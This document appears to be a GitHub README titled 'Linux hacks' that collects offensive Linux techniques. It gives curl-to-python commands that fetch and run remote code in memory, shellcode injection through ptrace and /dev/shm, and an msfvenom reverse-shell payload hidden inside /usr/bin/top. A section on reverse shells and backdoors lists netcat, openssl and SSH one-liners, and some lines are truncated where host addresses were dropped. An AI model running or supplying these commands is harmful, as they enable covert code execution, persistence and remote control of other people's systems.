
Primary LanguagePython

Linux hacks

A collection of mostly security-related hacks for Linux operating systems. It is supposed to show that, while everyone is locking down their PowerShell and .NET in the Windows world, Linux is pretty much an attackers playground and is not at all a more secure operating system (at least not by default).

(shell)code execution

Uses python to fetch a binary via http(s), write it to an in-memory file and execute it. For example to run the latest version of linpeas with all checks enabled you can just enter the following in any bash-compatible terminal:

python <(curl -s https://raw.githubusercontent.com/tav-r/Linux-hacks/main/fileless.py) https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh -a

of course this is pointless since you could also just run

bash <(curl -s https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh) -a

but maybe something like this?

FORK=1 python <(curl -s

Run shellcode from command line. First you need some base64-encoded shellcode:

nasm -f elf64 -o /tmp/shellcode.o shellcode.asm; ld -o /tmp/shellcode /tmp/shellcode.o; rm /tmp/shellcode.o
printf $(objdump -d /tmp/PIC_binary | egrep '^ ' | cut -f2 | sed -r -e 's/([0-9,a-f]{2})/\\x\1/g' -e 's/ //g' | tr -d '\n') | base64 | tr -d '\n'; echo; rm /tmp/shellcode

now we can run it (this simply spawns /bin/sh):

python shellcode.py McBIu9GdlpHQjJf/SPfbU1RfmVJXVF6wOw8F

of course we could do some more interesting stuff with this, like for example:

FORK=1 python <(curl $(curl --output - | base64 | tr -d '\n')

This script forks and lets the child call ptrace to let the parent process trace it. After the child loaded a given binary using execv, the parent replaces the code at the entry point with the given shellcode and detaches. This is essentially an alternative way to run shellcode.

msfvenom -p linux/x64/shell_reverse_tcp LHOST= LPORT=443 | base64 | tr -d '\n'  # ailYmWoCX2oBXg8FSJdIuQIAAbt/AAABUUiJ5moQWmoqWA8FagNeSP/OaiFYDwV19mo7WJlIuy9iaW4vc2gAU0iJ51JXSInmDwU=
python3 hide_in_image.py /usr/bin/top ailYmWoCX2oBXg8FSJdIuQIAAbt/AAABUUiJ5moQWmoqWA8FagNeSP/OaiFYDwV19mo7WJlIuy9iaW4vc2gAU0iJ51JXSInmDwU=

executing schellcode from bash

Quasi-fileless (assuming writing to /dev/shm is considered fileless) execution of shellcode can also be achieved using bash scripting only.

# read first function argument
shellcode=$(base64 -d <<<$1)

# create temoporary in-memory copy of a binary
binpath="/dev/shm/$(cat /dev/urandom | tr -cd [:alpha:] | head -c 10).tmp"
cp $(which ls) $binpath

# read entry point (check `man proc`)
offset=$(printf "%d" "0x$(dd if=$binpath skip=24 count=8 bs=1 2>/dev/null | xxd -e -g 8 | cut -d' ' -f2)")

# write shellcode to temporary file
echo $shellcode | dd conv=notrunc of=$binpath seek=$offset count=$(wc -c <<<$shellcode) bs=1 2>/dev/null

# execute and remove the file
rm $binpath & exec $binpath

fancy reverse shells and backdoors

# classic
mkfifo /tmp/p;nc 8888 </tmp/p | /bin/bash > /tmp/p;rm /tmp/p
# encrypted using openssl cli, handy if netcat not installed. Server has to use something like ncat --ssl -lvp ...
mkfifo /tmp/p;openssl s_client -quiet 2>/dev/null < /tmp/p|bash>/tmp/p;rm /tmp/p
# tunneling over SSH (server listening on localhost:8080)
ssh -fN -L48924:;/bin/bash -l > /dev/tcp/localhost/48924 0<&1 2>&1

forensics and reverse engineering

# dump all process memory including shared libraries etc., copy mapping info and archive everything.
# must be run as root (other users don't seem to be allowed to read memory)
 export PID=107136;export OUTDIR=$(mktemp -d);cat /proc/$PID/maps | cut -d" " -f1 | awk -F'-' '{print "dd if=/proc/$PID/mem of=${OUTDIR}/${PID}_"$1".dump bs=1 skip=$(printf %u 0x"$1") count=$((0x"$2"-0x"$1"))"}' | xargs -I DIFF bash -c "DIFF";cp /proc/$PID/maps $OUTDIR/maps;cd $OUTDIR;ls -1|tar cvzf dump_$PID.tar.gz --files-from=/dev/stdin;rm *.dump maps